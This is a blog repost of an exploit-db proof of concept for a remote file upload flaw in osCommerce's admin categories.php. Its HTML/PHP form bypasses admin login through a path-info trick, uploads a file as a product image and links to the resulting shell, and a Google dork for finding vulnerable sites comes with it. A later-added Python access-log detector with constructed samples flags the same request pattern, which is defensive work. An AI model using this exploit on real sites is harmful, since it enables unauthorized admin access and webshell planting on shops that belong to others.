Commerce Remote File Upload Vulnerability (/admin/categories.php)

Posted: February 25, 2011 by Hacking & Relax in exploit

# Exploit Title: [oscommerce remote upload from categories.php]
# Google Dork: [“powered by oscommerce”]
# Date: [20-November-2010]
# Author: [Number 7]
# Contact: {an[dot]7[at]live[dot]fr}
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Tested on: [windows-linux-FreeBSD-Solaris]

exploit:

<html>
<head>
<title>Number 7</title>
</head>
<body>
<div style="text-align: center;"><big
style="color: rgb(253, 0, 0);"><big><big>Discovered
By Number 7<br>
</big></big></big><span
style="color: rgb(102, 102, 102);">(best defacer kairouan
tunisia 2010)</span><br>
</div>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>Oscommerce
script: Remote File Upload in /admin/Categories.php</big></big><br>
<?php $host ="site";
$path ="ath";
?>
<form name="new_product"
action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"
method="post" enctype="multipart/form-data"><br>
<input name="products_image" type="file"><br>
<input name="submit" value=" Save " type="submit"><br>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>shell
here:</big></big><br>
<?php echo "Using upload File : <a href=\"http://$host/$path/images/product_info.php\">$host/$path/images/product_info.php</a>";
?></form>
</body>
</html>
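From the defender's side, the request pattern this PoC relies on (an admin script reached with extra path information that ends in login.php, then a script fetched from the product image directory) stands out in a web server access log. The following detector is an added example, not part of the original post or of osCommerce; the combined-format log lines are constructed, and the URL shapes are taken from the form above.

```python
import re
from typing import Dict, Iterable, List, Optional

# Apache/nginx "combined" access-log line: ip ident user [time] "METHOD url proto" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)

# An admin script followed by extra path info ending in login.php, as in
# /admin/categories.php/login.php?cPath=&action=new_product_preview
PATH_INFO_BYPASS = re.compile(r'^/admin/[^/?]+\.php/[^?]*login\.php(?:\?|$)', re.I)

# A server-side script being requested out of the image upload directory
SCRIPT_IN_IMAGES = re.compile(r'^/images/[^?]*\.(?:php\d?|phtml)(?:\?|$)', re.I)


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a log line that matches either indicator, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = m.group('url')
    if PATH_INFO_BYPASS.search(url):
        tag = 'admin-pathinfo-bypass'
    elif SCRIPT_IN_IMAGES.search(url):
        tag = 'script-in-images-dir'
    else:
        return None
    return {'ip': m['ip'], 'time': m['ts'], 'method': m['method'],
            'url': url, 'status': m['status'], 'tag': tag}


def scan(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Run classify() over a log and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit is not None]


# Constructed sample log: one bypass attempt, one follow-on fetch, two benign lines.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Nov/2010:10:01:02 +0000] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 512',
    '203.0.113.7 - - [20/Nov/2010:10:01:09 +0000] "GET /images/product_info.php HTTP/1.1" 200 77',
    '198.51.100.4 - - [20/Nov/2010:10:02:00 +0000] "GET /admin/login.php HTTP/1.1" 200 1800',
    '198.51.100.4 - - [20/Nov/2010:10:02:30 +0000] "GET /images/logo.gif HTTP/1.1" 200 4021',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['tag']}: {hit['method']} {hit['url']} -> {hit['status']}")
```

A legitimate login at /admin/login.php does not match, because the first pattern requires path information after the script name.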

[~] Greetz tO: [Meher-Assel(Net-Own3r#Shichemt-Älen#Sami(s-man)#zone-h/crew#all tunisian hackers]

[~] Home :info-geek.com/ # v4-team.com/cc/

Download code: http://www.exploit-db.com/download/15587

Site: http://www.exploit-db.com/exploits/15587/

Comments
  1. Number 7 says:

    Thank you for sharing my bug 😀
    Number 7
    Tunisian Hacker
